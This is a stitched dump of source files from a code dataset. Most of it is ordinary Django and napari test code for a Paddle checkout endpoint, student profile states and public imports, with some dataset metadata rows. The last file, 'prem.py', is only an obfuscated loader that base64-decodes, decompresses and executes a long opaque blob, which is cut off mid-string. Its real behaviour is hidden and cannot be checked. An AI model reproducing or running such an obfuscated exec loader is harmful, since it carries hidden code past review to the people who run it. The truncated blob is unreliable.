"id": "11111111-aaaa8f3706b5378-17fba8a806",
"completed": str(completed).lower(),
"passthrough": '{"organisation": "PKG-Deploy", "user_id": "1"}',
"email": "pyematt@gmail.com",
"created_at": "2020-05-22 23:42:02",
"redirect_url": redirect_url,
}
payload = urlencode(data)
redirect_url = "/someurl"
url = reverse("djpaddle:post_checkout_api")
url = "{0}?next={1}".format(url, redirect_url)
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 200)
response = resp.json()
redirect_url = "{0}?checkout={1}".format(redirect_url, data["id"])
self.assertEqual(response["redirect_url"], redirect_url)
checkout = Checkout.objects.get(pk=data["id"])
self.assertEqual(checkout.completed, completed)
self.assertEqual(checkout.passthrough, data["passthrough"])
self.assertEqual(checkout.email, data["email"])
created = datetime.strptime(data["created_at"], PADDLE_DATETIME_FORMAT)
self.assertEqual(checkout.created_at, created.replace(tzinfo=pytz.UTC))
def test_checkout_api_missing_not_required(self):
completed = False
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"completed": str(completed).lower(),
"passthrough": "",
"email": "",
"created_at": "2020-05-22 23:42:02",
}
payload = urlencode(data)
url = reverse("djpaddle:post_checkout_api")
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 204)
checkout = Checkout.objects.get(pk=data["id"])
self.assertEqual(checkout.completed, completed)
self.assertEqual(checkout.passthrough, data["passthrough"])
self.assertEqual(checkout.email, data["email"])
created = datetime.strptime(data["created_at"], PADDLE_DATETIME_FORMAT)
self.assertEqual(checkout.created_at, created.replace(tzinfo=pytz.UTC))
def test_checkout_api_missing_id(self):
data = {
"id": "",
"completed": "true",
}
payload = urlencode(data)
url = reverse("djpaddle:post_checkout_api")
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 400)
self.assertEqual(Checkout.objects.count(), 0)
def test_checkout_api_missing_completed(self):
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"created_at": "2020-05-22 23:42:02",
}
payload = urlencode(data)
url = reverse("djpaddle:post_checkout_api")
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 400)
self.assertEqual(Checkout.objects.count(), 0)
def test_checkout_api_bad_date(self):
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"completed": "true",
"created_at": "baddate",
}
payload = urlencode(data)
url = reverse("djpaddle:post_checkout_api")
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 400)
self.assertEqual(Checkout.objects.count(), 0)
###########################################
# api/tests/test_student_profile_condition.py
# repo: matchd-ch/matchd-backend (Apache-2.0)
###########################################
import pytest
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
from db.models import ProfileState
@pytest.mark.django_db
def test_condition(login, user_student, student_condition):
user_student.student.profile_step = 6
user_student.student.save()
login(user_student)
data, errors = student_condition(user_student, ProfileState.PUBLIC)
assert errors is None
assert data is not None
assert data.get('studentProfileCondition') is not None
assert data.get('studentProfileCondition').get('success')
user = get_user_model().objects.get(pk=user_student.id)
assert user.student.state == ProfileState.PUBLIC
assert user_student.student.profile_step == 7
@pytest.mark.django_db
def test_condition_without_login(user_student, student_condition):
data, errors = student_condition(AnonymousUser(), ProfileState.PUBLIC)
assert errors is not None
assert data is not None
assert data.get('studentProfileCondition') is None
user = get_user_model().objects.get(pk=user_student.id)
assert user.student.state == ProfileState.INCOMPLETE
@pytest.mark.django_db
def test_condition_as_company(login, user_employee, student_condition):
login(user_employee)
data, errors = student_condition(user_employee, ProfileState.PUBLIC)
assert errors is None
    assert data is not None
    assert data.get('studentProfileCondition') is not None
    errors = data.get('studentProfileCondition').get('errors')
    assert errors is not None
    assert 'type' in errors


@pytest.mark.django_db
def test_condition_invalid_step(login, user_student, student_condition):
    user_student.student.profile_step = 0
    user_student.student.save()
    login(user_student)
    data, errors = student_condition(user_student, ProfileState.PUBLIC)
    assert errors is None
    assert data is not None
    assert data.get('studentProfileCondition') is not None
    assert data.get('studentProfileCondition').get('success') is False
    errors = data.get('studentProfileCondition').get('errors')
    assert errors is not None
    assert 'profileStep' in errors
    user = get_user_model().objects.get(pk=user_student.id)
    assert user.student.profile_step == 0


@pytest.mark.django_db
def test_condition_invalid_data(login, user_student, student_condition):
    user_student.student.profile_step = 6
    user_student.student.save()
    login(user_student)
    data, errors = student_condition(user_student, 'invalid')
    assert errors is None
    assert data is not None
    assert data.get('studentProfileCondition') is not None
    assert data.get('studentProfileCondition').get('success') is False
    errors = data.get('studentProfileCondition').get('errors')
    assert errors is not None
    assert 'state' in errors
    user = get_user_model().objects.get(pk=user_student.id)
    assert user.student.state == ProfileState.INCOMPLETE
    assert user_student.student.profile_step == 6


@pytest.mark.django_db
def test_condition_invalid_state(login, user_student, student_condition):
    user_student.student.profile_step = 6
    user_student.student.save()
    login(user_student)
    data, errors = student_condition(user_student, ProfileState.INCOMPLETE)
    assert errors is None
    assert data is not None
    assert data.get('studentProfileCondition') is not None
    assert data.get('studentProfileCondition').get('success') is False
    errors = data.get('studentProfileCondition').get('errors')
    assert errors is not None
    assert 'state' in errors
    user = get_user_model().objects.get(pk=user_student.id)
    assert user.student.state == ProfileState.INCOMPLETE
    assert user_student.student.profile_step == 6
| 35.264151 | 75 | 0.757357 | 491 | 3,738 | 5.590631 | 0.09776 | 0.136248 | 0.104918 | 0.081967 | 0.884517 | 0.855373 | 0.83643 | 0.799271 | 0.754463 | 0.754463 | 0 | 0.002528 | 0.153558 | 3,738 | 105 | 76 | 35.6 | 0.865044 | 0 | 0 | 0.719512 | 0 | 0 | 0.108614 | 0.086142 | 0 | 0 | 0 | 0 | 0.463415 | 1 | 0.073171 | false | 0 | 0.04878 | 0 | 0.121951 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b15779157155eee5db827770ecaa46427c7749bc | 74 | py | Python | napari/_qt/_tests/test_qt_public_imports.py | mkitti/napari | 4e954d30b5a1b70c5e495db1b8f48a3bdda1ff86 | [
"BSD-3-Clause"
] | 1,345 | 2019-03-03T21:14:14.000Z | 2022-03-31T19:46:39.000Z | napari/_qt/_tests/test_qt_public_imports.py | mkitti/napari | 4e954d30b5a1b70c5e495db1b8f48a3bdda1ff86 | [
"BSD-3-Clause"
] | 3,904 | 2019-03-02T01:30:24.000Z | 2022-03-31T20:17:27.000Z | napari/_qt/_tests/test_qt_public_imports.py | mkitti/napari | 4e954d30b5a1b70c5e495db1b8f48a3bdda1ff86 | [
"BSD-3-Clause"
] | 306 | 2019-03-29T17:09:10.000Z | 2022-03-30T09:54:11.000Z | from napari.qt import * # noqa
from napari.qt.threading import * # noqa
| 24.666667 | 41 | 0.716216 | 11 | 74 | 4.818182 | 0.545455 | 0.377358 | 0.45283 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189189 | 74 | 2 | 42 | 37 | 0.883333 | 0.121622 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
b19522bfd476089cdc2f9d70bd284d6fec8277db | 60,118 | py | Python | prem.py | iyanxlord/premium- | cee19ca5a4582c736f523601eb488dc44ab80434 | [
"Apache-2.0"
] | 1 | 2022-03-26T01:48:11.000Z | 2022-03-26T01:48:11.000Z | prem.py | iyanxlord/premium- | cee19ca5a4582c736f523601eb488dc44ab80434 | [
"Apache-2.0"
] | null | null | null | prem.py | iyanxlord/premium- | cee19ca5a4582c736f523601eb488dc44ab80434 | [
"Apache-2.0"
] | null | null | null | import marshal,zlib,base64
exec(zlib.decompress(base64.b64decode("eJyEnMmyBDt3lec8BTM8Imy1DFGmpFRKSvV9eOLAJoAwAYEZ+PHZdeHCPwEGp6k6WdlIe6/1rWzOf/zP//W//Lf//i//89/9t3/6D3/3j//iH/75H/7dX/2vF//6H//L3/39P/3Vv/p3f/vPf/3X/58v8pev/+1fvvgn95ev/v4vf/mb3y//+Oc75/+9zN/8uczf/N+XQX8u88cv//DnMv8JvuE/3/mbP98hf76D/nyH/rlC9D8/+W/wn8v/337/+//z5l+T/r9f1b/6c4t/fv3Hv/3nf//v//Ir/NPf/vPf/f70b/78ULpjPOm1n4hfpPbxmeFybWHNFuJ2LFgrVPncLtHn6sr9qle8txL3LcJ7i/cpX5S+i9Af4Wtk5BXiimi6Sl667l30feoXyTdOGmTK0fBDOzHwF1NQJP5OUtl94FdkqyNvtRPraDjGkkWegqN+2YaSELvcNmL/hf57zw23fj8RpRSxNaj0halDTMp8C47m4ivKJoxhd/XPiz8zH2QPQe0TJ48HJUlzeAu5dJe64Mr67nvk57jPUSV4sM9dK/q0H0g+I9R2h/eR9rVI1mH2N8t0IZxrR9r2E1zKh/pP7eWuvNeq3+xGfPzCFY1i0DAzoHyy99yza6N6lXmnGhLJesHiNE846McHUVyx+zYPtrXl+oXZVLvomjBH+6M0+ydilUSD7afP5rR0uhObPhpt0moSP/4sFllei60vHaro9W6P2dn3Kut7CCpLho8ZzvktKo+wq+W3HeJDJQ+li2H41hZD/DVh07Um9poF2lBdBeGFcNn44OQS9vL3/llrNPagQzmmZ4zpvvE9F9u2CszY2pgydD3nLOF4iLf6kDFVB44ejLh9aEGntMwZped920eYGpw5PHDtFjtqY/rWwE1aBSPg6qEPJZ6HdD8r+FBkwqdvnuk1FOeHIxd3Zu6OgV/HBKhcnuRgaZanpERlYOleHqXbKtgyfT87Y3o8SSgZ/jGM3yceevhBWPGFn7ow7TisvXz2q3g6O3FcH65/G4OfHpnka72gUlKhX1wv/8hZ8cMehsujXENr2ap9jfsTl6K8fCw73FgNA9/Pya6NiwVcr13ZeT/lwkNZJQKFZ9LXXeaFAf+owgPeL1lLkdun2rOP8VF7Yc9ljH63u3Fx+1Q5np0oMY7d8rvicykkrquU+HT4k4ajZbV1kh7JFA37+u1sGeU+U/CB8X3iMz0cS5FZhoDIGWcSuZEHQTiqmbikkaHxvkO7VmNbM4kvc6A1lG/XA6vE9szVpy8l+TAe82Ejr5c0aSLaND263BRXDGXxZoHakdwydvKDs+jtsJ2ym0vY5+kBNVyMF5gGDhtv+cK4X3dkX3R274eec+W2imnLGAEjaS6x1uX/eDOIF76n8/4+hzbO2ZnQckAfX08qWZ7So8Vxntun8UR2Ht6VJtgYw19c5pOEFOl5WU7y+5hiBX4SclHQSZrRZ/g1Pz+r6QXmXWWqW62akrNrHpJVPsqy/GzZ1zD8VkexzLp3rWl77FM77qZc6ZasyWXP0oug3pTGL49qnGe3JwgSdm/sW1pCCV4vh5IE3aCzgfJw8sV7MsTIV+TlTxWfeK8m0Jfu72ov+qQssOdhOlBuKEgYMv/Sj8prBdhiRjhkQzjLV8xutc9gXchtYfZ937/SDQ6K9PsOfkCkCn5Yxs/zySCh7Wa7N4HtQjX0DB8x+jqkWRXnut+T8Reer9TKexfVhitrgb/nEXZWaNwHBdKaYteHn2mRP61+RraYkbz0615K2a4V5HXvYNyCcfhGOWNZ6N3NYcSYdL/3DXnBXxIMJIN+27nGwQoyjlsua0Dm3MsSDkcQTuady0BoIL4XIXkqWGa7UhObeqq8Y73JzjOWkx8sW+q4rMh+nfTra+F35x3vlLovK0Wu2UcPtnyjqBJUFBPS8nW7B6ZgB55TG3xn9CgxyyUzUiqZK/T+SpAaCj8tn
TcrUP5npwXFKCxNah79aqK+3kGqVf3eZ6TbXNVVnF6YSHbhB+RX25RgwAL4QzXfdh/0VYpfBitsv593TAIhjDXzrosCxW1QES33O/oVlb9ghy+jM2hHZtmXS6/W6habPPfjlWgVZaEz6PAt/C1l3f5M3l89hR8J5nH4j2w2zxkU6gSO3zB1B954DgZjwT5Dbxd4zeEp7Nhq8M1/esteDibc5CcEX8Szz4Gcye9d5BGMWeYn22Q1mk2/jMiDKqPlhnrj8m7kFh8W7WJvQV8DTTf0eUIC1qiddJYLOV4boe5tqFAoivKm52u7fiCU7Ewa0KWFroaUS8GI24tefglejJAuDqhhqFX42Xy/hvFP+3h2FmZL3CEBczyWW2I46eHR52WCn5Lqmx+TMxpXC1PJ1xde3tL+0IuKQqbZop2h5PBpzOam7vrEecf+BW2fq0lim9RcE80zCeDSnR8D0hruLeWpuDYi2mkG4OMyTfL3EZ1/kopxWWY1Ch7G5Wl2JGfy89P1+sFf9kLkA42Y4RnUsqujb1FYZfv1ASrwzumIn0+Un5XdET58BZhE82pQAW4Hgu1CW/KixOBvQ+63fvM0ULKtE4AQgILLsDCIZaiFCP1b3w8svkbthIXVbIY9sDC68Rh/WM8fPFPZN1rBoAtgaQKKBEUw8e1bTU9gbW3t+fwWl0UIvLLrABowqN/v74ZNTO6Rr4G3iY47tD90X5xAO2gNnel/xxfh+JK3jQ9yLyKwpb9BwbSmEWHeoAs3ByYZ3C4E/WxE/NXr6jBeywJgUlTcw79EU+xccfhclygTCVPI+68ONW9gAil7sKOUkHoodzLjzGNPW3SdWNiOAw2bxRJBYjguxAR6ExwrArIE40rq2jXCeAJYw66tflEoqUYOx9eyYOFtUs6lsYZeT+UsNq78qp5v2oJ5bXtfzPf9mxGdXoMl9/JkOSjYpVhUdCoKFREMVXn/dZy4Tx3YRtV1rt92g4J5tLElJi9KrSX05fzisD09YXualV/R6QSLXhXGEfYKJiXfCfAHFjJbpl89gjXtxGCw5q/eGH04KcJzOBzwUwu/QT3EX31ZCiJ5XscBmR9Arqz5lMCr8HnHT4SQsRhMyKtbThdwnmvZ/9Zrf+ulv/Vq4QYcApC1BbKBj/6agsNOPFObvbhzhdVFZYF3EqOfe8WZYF2lb4GdpG+yCwso+hMYM6Aw6eLl2TQWZsHLJZMzcdob0FhXMFIWQy/vJ8FCfD5jsnI1hfDzPcMWAFANFPeRqNhkU0PJzgpsdQ4HHQTk8YruqfAzBjhVtDsCyAT/tsvfYUQunhud/J2eegEaeOPowTzM4prKrM1nc62ZWcStmRotlIyaL/fd5LiAvRoU8XORTiTsCHr398oIilmlRh4/qlWvyfdQA4WRk47+dcR6VKB6zl2DKZ2E0QJQC1jvVJ9/CWifxArXwRtQA3/An3W2rJ4JuG6+m93z+TyEs96bj5SQmxkRhh0TzckiPbV/CaMG0cjcLwEOagf0bIPXQqFFAM7JoJQlttDnmRvnt1n+anObxqfv6zWXj+iuhC5QVbCDZ6xJ8wfcqFyc+1wkvM15O86Hvzf4MmFOFexRrBu8FYpe/wIcens+PvkGwUdKYZ3DCkTws0tO7z47nqHwK4lLs7OzFCTRbZ/OlA/vyAUtefeM9AvHbwCZjFjXqF4p5L4OOXZLvykmGTrLvw96oDjH912ih/mYEcD/x43fbzjEQ3CeCFvmAvksQ0PErh2NPmBKPoz08JeD8Qx463lxf54P9O6TN2p1keW0+K6LRAYwgNYYoJ4GGERaBy5QdyobBjMCrEs2E+0J81y5Bq+pZRgB7u/lw4C+fVOjdbWQdpJ5hU+I1oPKdjzoCUQ/3gRF4os7zMWMqk/UbDIYWsl48/EW/D6CCAqpCrl75RsiG88TBJC3iXcJ/AZrXkfGFvfeOHo1E9EHENTc7qIDREY8YUpXoSixihpt49r92z/V2GnrOb2CTJP9afuqR
I7FWl19KOj/KxCyrsJpgVkqeWYs0FFB1qYJlAfkHfLCKH3XTK/QROZzlzivk2vPG7I4OPNZw0UQYt/fWhKC6Ny3MRRx1ff6/Xz6hgj4x2s4pHLdQHJ93M+jB3MpWYJ5mlCo5Nq8zPiicleLCMAe1m4dDDmskq2AF9kNxXq5C1+Hx4WUjB3SmZUYwgdiN0ipHaXcu936YUkHQ5vDDCKvwslUKKuJuH/svfH0N00OhIw3LKs/929KmiVBPlq6XedjwfskiOw3PBvt2kXjz4RREMD0HYGDmj/oZinY/X34gH6kU6o2YwuL6TdqdUWpCMWerM0gcGCnEQoYEwQicUFZune5Ap1gAKnNHDxYPnyTwQ7/sjqvbiik5pfhmzDXKDYzqEdPslepdGwdC0rjLmMmX6gpwU7zBoVm9RnTdxvbnw8gZorvW1Z9TK7OnKjhfeAD83bauBL7hLxwnmugoR9iIBEt4ORg3YdAueNwsFYcZeqA/pp1BtHCOKBjFt5Cu+mAftK098nurTmh457dHQi6QHf49BtFA0Ssc7pQx3xtBUhZNISe6a0mgniMDRjSHQuHxpoHGjOpoj/NHunxB+yK3GbvDD6WOb/wdqDSg4YNejSWeva0fIcNr0vF4BVdfxsPsIAm40BMQ+EEfaeLhUbdvKGGqmOS1obQF25w7IoE+Enfw37JAkioTLLYBc8403DDtPrTeVviXRUEzhblY5R/ReNOo6yf0AhI3Nzxe/Jr/aJgYzFNgIf64G/dXuSkxMsQgVLS9H6Lz8+rU2Efv4B3OXyycwj7PTQhQF6Jzl/rwM+gbdNew2qIYEpgKXj2tlKrCs8bfEirniObcg3khr5GwKKvAJwSn0EQkje3ABZxgBpfWFN4DazOwR+YsslZXTlEgOsnmTVLpVoRfQS5AbNvW5nrTqRgdkPNkRDAOaXW7Rr6qyaF3we50R18AwrmGKByBAq0s41EMZJlf5P/EPRFugMgqTY1747BSRBkBzWUwl8G6xIYB4gxoTqTBNTB+LaHOrOX+qAdP1mcdb324r+3PbnBgDoRM2R93MA8PTTJTAX2zmAOoWHuFwpK3jkSP+RKY0MflfIK28m7lN1X8qwEoGcFUeQayt0AX+mZ84VyfSGStBm4r0aUnMChznBpWJ6jVXIS/nbgPq0eBpHtLcXHBnsNZU/oowzEnXs1/nkMIJMaX4XJNxSOIMa0ni50Q2Y65XlvAqpiNmg5SfO9soOUAEsdiAABIfKA7wAeX65PCJOf09e0EHqdAsWJvhT7I495BShriGjrk41kcNjvHbfR52jgPOjDnRvpu0PGBnG81aadGm3LB+vnYEz6AxkWyRH9RTc1WNC6tf2Ckx/2dq/tv3HE3MmleBLrke9A84xATPVEeZ84nxzSg7y04SMsf36PWq6etYW0xUzUkJX5CJQ9IJGrvPBbNBAaLNhNQ6YGDaFbI8mh/rrlpn166Vxl4/tbhCj3pRo9VynlU9vuhOJEuZQP1hC8P/cFfB/CbX7pIey7g6cSAiRVGtIMiWAH4YBovnSVW4V1dCCBPsQDiRPd8bQcTDnVUSU51W63+ChP+cCISuU4tjtfEAwq4uu6zDrpe6Gr1scn8e2J6bXRhUtbBOvWorCZr63ZcOb5CGi25AHnDuGa8xdy4dyuEaPACPnVxa7imxJ3RsEZqLrW6RF29101fawfU1uqQixUclhhL0h5AJf7htlz6sp3gVEKtb3zQRKgOaYYXqISDxCuAeu01G0PAPiUgacx4mAajWd1w85YLjtCeNOFqmZqAB/TgQyDOik/KfXAY4yNCmHaizsLLeAwv/cOkAix8ptAv+nvnBFrUKXEEqq/nmk/D6N6WcIxiIrrHCJfZCvFCS35TBxAqCc2DTQuRaxc82Bhjs3iuiDmEWll+0KGHux8T3KYPtfEXVlx2ZxddRhoVIQLmRdJEiz9UufRLRbDl5H07ryQa2BD0Pz9EQCs9GoIyCoCeiLkpAwg0bvK58b+Jg3am
SNrzABJuNf00vtnKQnREfANW6EiOwo6YHp7GagDBjnwi+onem2HUs0FzncD78HeH1YZEOCTwvNJlK5sXhKELIC/CKtZ0iZ32oy5SlPuqb5UA6got48qQLZvztyKiVwumZAEuIJfYyBE4pSbjQhAj/2cu/zOaLQR3r2qzgjq753qWVKhKwmwROYivTcdAtpd7zfgR7wwTrVMlz0ob4US1BxF4yAYiYdrK1/THNPvHldBZjnyCF0CuVBGxKo0lITesBxSdx1DTw8CRz3EbV2Ainr+0vbIX+flfVYIjE2ksdpbQ9G5D35dYrMNlc5Bk4u8F9XaeZj+7536RX19If5OKvGT4zD3mRSpvJtbJFMznDDcD+iGAOkHXNdg8kJ/bWpfeyfEsYdlkPjxXTUtEF8uTBy6kFwVU1Vdc3wQre1kYdzinENmjSY//G4gzjQDdMSnAHdOtlNaECOokpp6ejdVPmKdgj7ILLsyaXnbNo/cMS5gAD/LKdMT+YGegiF8crokKcjaMCsXkPJeVYKsE4uvaf3cA6IgaxYm9s0K306sh93PLYFQ8m3uyioukJmLaBSy0q+kfbSpaYXQ9N+t7k/6n3K4IHWHzDdjryIaeh9FwX/vCHtcNyDspRflG+dYF3TbrRiUkYMcA9mFQO3Gr9nbcIdBvYDBiKUo9vuMMu4mtAWEHzVMaLbvjhOtopAw4QoXdBm0uG/6o+teiLReaZtAymbJ42JwnYlTgz0GgfaCVdjf6XFg4CERtjdy4KOGfN4bqcZLLyHge/yBTat59qmI/2LWK5V6P+krDpO5r14O7Kmvg91CyhadphdrQ87w8gcDJU5FK4RfLMqGjRLBvahrbcEsDBRD8AHBr7SCPFXgddgKn7tatp09aQZ7c6EW+OB5kO5WhF73cafuAUT8FWCwOJ7pdGnserGbNgjmBhUZpsSk22C/PgegIsvvvDz0gZeQMIp/ylXeR1F3ebAI7VoEMB0dZiee8AH6nF1QsFHQ+EShvyc6+kZSvLw1px5i/TO7edV8OgTzXT76LNvX7Ii/mDGWMAydI3d3Ri9wKGYm9xysNH5BNkRYpa7fAoquVfVC8b+BIfd4BuTb2cDg8DNCTFpnWZrWWykc/sPASOP8Zar3+spZ9w0juBSSOVw2sZJGKi+nAfZvSfa1DZYpIXLqpMxDOFWOiPu6loQj4FCibrzzHZPux/Ly+9kR4EyiEFi7amdAzhqVHxycY+ZelQIjx/GORD8dkVNqhPS5ja6HgRFT+8GOhNTPDKD2K1aQEarDqo8KUbZzP6bpDRLPnbJAa+w2BY5OOr4h4JcoqVQm4rbUAyjOIpkA0FFq38xz7dBB1Woxmb1BnyBA+e7UL8F/xOXqgdKYt22QoukMxr+g/WICbPfAWKGxyqz7GHiabXtmHsLXR0BkOxwpeyHoRM2rfTIqbm/brMfm8ip/i+Yk0EdUHwfiR3ru3M4+zYTXCKOsG+zddwz1eTACY7Pi1eEq7e46Jqtnd2qXXz4BXURi1kfYD8KD01Cnq9ZLY+01YEWFqovB6HkPNVWF7PYWyFQKV31nBoYZqoYEq+rvkgg+8vrGiyDbF4hH3zT5UPsLhjJKgMVQ7IqudN1UHBA8rN5fvz/PLeiphmN+pLUob3kyZGAMjS7v+goAVIAvCIGg7kVEfnlT8uXX08WFOEluoDsrBP2p7pc+WV3x7jHyCBDKIUgX+3KDeBgQTqJ5tWUY5LQIgM4DJTf2Aex0R32OXqDk3Xz7i13Bhl1cvYDx3tV+izkcL/BwU5H/AZtYW3fiBUCF8xeCBvhFoNs/ZolDskbf+YzJ5bnoekIBnSJ0pshBDhjCTy911hTYVPE7aD34SgU5XsJ3v/omoD+QXD2yYY3sOK8apBsKI+cGbIs4kMyy1248EkkfoHXeJuCECQd6/Lthde17oT+Kt6a/o4NLlRSug3tGV/xkuIPq7cf8ri5CVz6iFHkAbNd7brL6ERVHZAgUkEORQeSg+snG8a58h
fVwc9NwJ3YM4/deywKRVbDqagGijuzifEQeWo7e3PbkH+re0GOCDJYjrV2rQQbJtX9jKqBIfkloByTdBzQ34MutnhhRLwSqtVGFQKMu+mxkaPFo3FbGB0bJ3pdnFCjg/SWvD4pBbBB4MZ8Xh40eUHwPumTs9FfzaLanjeEfP055LwiPuMfZG3TskdjFhqcK3mhD4vW7nnk/Zbwm9Qk41TH+nVLQP2TJBvLL1R4k8rZQkMS/18hHYUgMj23BjieqDpDGavjRFh7gcNGTZDc0H4iFw/ANlhMASEE+JDuVn35BhgGRseEMCSxPKkMMcgSzOLC+DJFjXvkqLqMHrFV8r4Ckdt8vQh9kvHxR9NlMM/SzBlG6tkmf5EubZTz2WkGQvhD7XWBW7/t+c5FbsN5bubU2lz5E5if2R7VJYZw8WGH8jEO3tSGsD78AaI+WyQjwNnAc0qVxDKX3q0DbQEydW3QqkLSjYot2nKtqthMHfx1lA46Cx3IXBPUB4U5HQHIOEafAdjloKCT9A8coEMEa+PJ+NqcEbA5/l/HzHAoh2x+SPm4dr5z/8ok1mUNZGyZyaXQ+n8ipQJNSypj8CS6F5eGgk2wWaTNAOdshGLlZEZhRbf1NOXt2DUJ/ZyfNFoqzV/Q6jC2n1TbgCOcy5XkgM0IjOoioTKj+fXGwwQxPssKRPqmM04/LqsvCLqNe2RYBVToR5O7KBZJxSxC+5br5lHFDlLinz2YITRz5tN9y8zsViJ4ZnVUFRS/k5TlKp6+wKRyxR3DsLMQyxTCxml1s/cwsT/Uu4CwhD+/2VVhTqEDIeYDduHAuQQ4AGtHvXo/bsGu5923gqE7vLJ7W5/c0kX2gr7uXUB9+wCe6fw+4XvHkIU98g7toqcm9ERMOVCQfOIBiZ2ct+T0N+p3TOh3hQFffhU6dXNEYBjFIkU/skEigX64FzAnlVqXZCW+zjYbM3b+YENjD9jkDay3zvN1BL4aErvPHicYM4W9EANYOcPQ7B+gTGRZVD46CjaLnC9tj3MXbgNVfYOf3k6aDWRKzuYIJubA874dyexKCtn7zbdVVICAL+Q7RpmGN2FN0xc8TvUJMzN+5GgFYA5KnuAbKBHv7BqTZsc3SGth3MnfGWGaqNVGxnmaIWb+z5aIrASB7z+tBv5uqXpI75WVu4I7mwQyIkBd7VJ0GEEED88hLTUg4ye01TJCxh6lx+yBL+U6PHfzTGOwCwvaTudx3Bg+4mdDc1LtuwgkglP6W0mD1MC/6gZAGVP6RI66aVcUgHBRUSfj65I8UCBTGNKnznfeLHimcVeuout8+tD58nxDkDcBZWNPXBMayVJtmv+ZX4VdfDdJiR4r/sTJ2ySnKDWEY9PuaVwTe90IuPS91mdHdHga9jcPi9p2A/XWDvckXcP4CKgXQHqn6e4HhvuHJEBPh0Nq1bcYrZAWUJbQTYCO9m/JDd+hIou5AH/TYOvJNTuvAk4ArHwwmHIiY1DGI11uT4a6iCrlOg9ioKKuxmgy9cESY6dXvfQsoj0rwyETpi3zxMQRC531BeJboeQaPQF0zg2vwVgE/TkyX7LaJdnOy39sD2b7ZT4bJ/dAWbxhpSAttXeBRzhn5M9IFmMtrglxWK371mRB8AG79Cw4RwxQkmHvSdH2OXIYs1HTlKJOz6QnlmQbY6xJsT8H1my5PBVXXSE9IMURfBKVJgHLxkO9FpL76fd/DBTCVSzotncgv6LdELuSGuocSAhRtOKBmcigOrJlWRy00NZmjQ0AlyBrgCtXiB3xGDqH3BPliykqjQIPdab+rqOWaSm8hsonspPfJno7MBqAwlpr9LuWHK6fP/N6HrEXh/cc8Nlj5x/kplaFnuSA7wwH8zsj98vIFBLbKvN/KFk47XUakSMuEJmHQpI80g8hyfQYFosQVqMSXeh6RfrnVQtzfsM04hnznNCkimDcfJ4k/DU29bUULw5tFBgkw5IEavM43O7xQ1nDx7gbUhPiMk55W7Wa0xtBlA
rpsZ/a7x6PdjaiQL37g23ndbxVn32znQthOu0P2YRTcmp1SeASoNA1KKjYhaW6SM6DH7/V3o2OKhK+d0vydCw/K3xDD5+VIfNZjo3vAjO4ptaSoqFSfS+tfwiS/K40f6G/n9+iRAlx9Q7e5sMa/s6IMokmvteGn6EjJdg9w7F0gVgbHPxLYF+w8kHzQAEbT8UsZKxgcDIHmue5gxr37c1uObS2sPLBvlOeZ47F66NnMCOCvSU7P+20WWO3N0emdb2vOgGzbG4ecwUlHi14tHPPC3GPQ6/RZbucuoSSwUKyeBDG0O4iu+BsyCAoDCNMQcnq0OTAJZRa3uO/hvLRL55sbX8SH7tciAqHhemtDy38vJ27k9qb6u5IVIN+h9LhJABbm7/qZ2LAIrOoR9BtYgfdAb4oixIP8o6/f5TswqAZY9kV1CR2n2BX97pxL330uCMf6AXRCuFMMUQLCsClsUHqBkly8fsD8LoYOSHIvJYVan8+oiUf1F7SpTee7Het9gvQEQNOtJG808ywV3UwCkvh2jgLJrBNy1TMAJjCVRw5EJaTLVE6yrG9Ig+39rvFkIqEHswNmy88DuBJmfgTqmvavWQBfr152k/GQCJkMoazj83KeNGh0dHIL4/OBwGq0cEovZnQrL3YL0r8tsWI+T3zh4y9QYSLWDjHPig/+DVVJvNHlUQQcr/t5qg1AfRTxK5wDqjJ+URok4v2YW3EuFq+iB9iDAVjibzyUQj4oGGoGdcEOFCoMSC9Ax0Rn9RCEvIi5UlDzmQGbLrV7XTDeE9xOH5ZPrx95EzoTH9eA3+h7bwDHFjmIU0WQSwZEsA/8+9Io2e5ZaN5b9R43PIIkxEOF9WtT+cfiN99vNOHuN6MVgbynDQM9eYzAwALZlOhY5xcS+O5WCh9ArJ9LPhEFWqSEnYNILXkHmBo35G4QzpRTk9AdWUgTCb+KWMDnjBB0PD73A2y+LqSrWwAP3yVMnYrvjOceBFLI44lDaHWeamifjVDre38bcPyeWKxRgHujlPi2AGynfwya87zPMgKy+34cZAvxXi6epyHO7vBqKWbMCG8M9VN+Oc54oFMuG4PKte0yr3kiBFTwf5wQKtqPGfQniy5xSRxSylSXoFX+Hpj16RHAHCiHpUMSDk6k11Oi4/a73c0VHTZ/Ao73mLpjjN97dDOQTLmlbIIH0AKWnDlkTAzJbx+95uPVAbC4noEBYI2JiAum7UtD0RYS/TjvNVlC+A7fBxkHW1WA2Tq6+HcBYlblFUDdnLd8uvs9LzCRfOC4GARCP2D+Kre6dI5fVGcQWBrRG/LjauODlILvVBkdeq00JgY4NvH8Lvp599rNKv7J060EpkxFBZIuK1OPCdsyrq/3kTpEUjUHlSUwBOdzzCF6umU3GqQPXveg9SRHBgxbXL/7EqTyKZVuFFovar/7lgBMrxPBWZ2zgH2tB5uFpjYYmBaulIHIcGMEbEkWr6c70GKYEHXjPb/f/UKfZVBM/dP0vJPGnJzLHqSDuKgOGRvC0GckBDh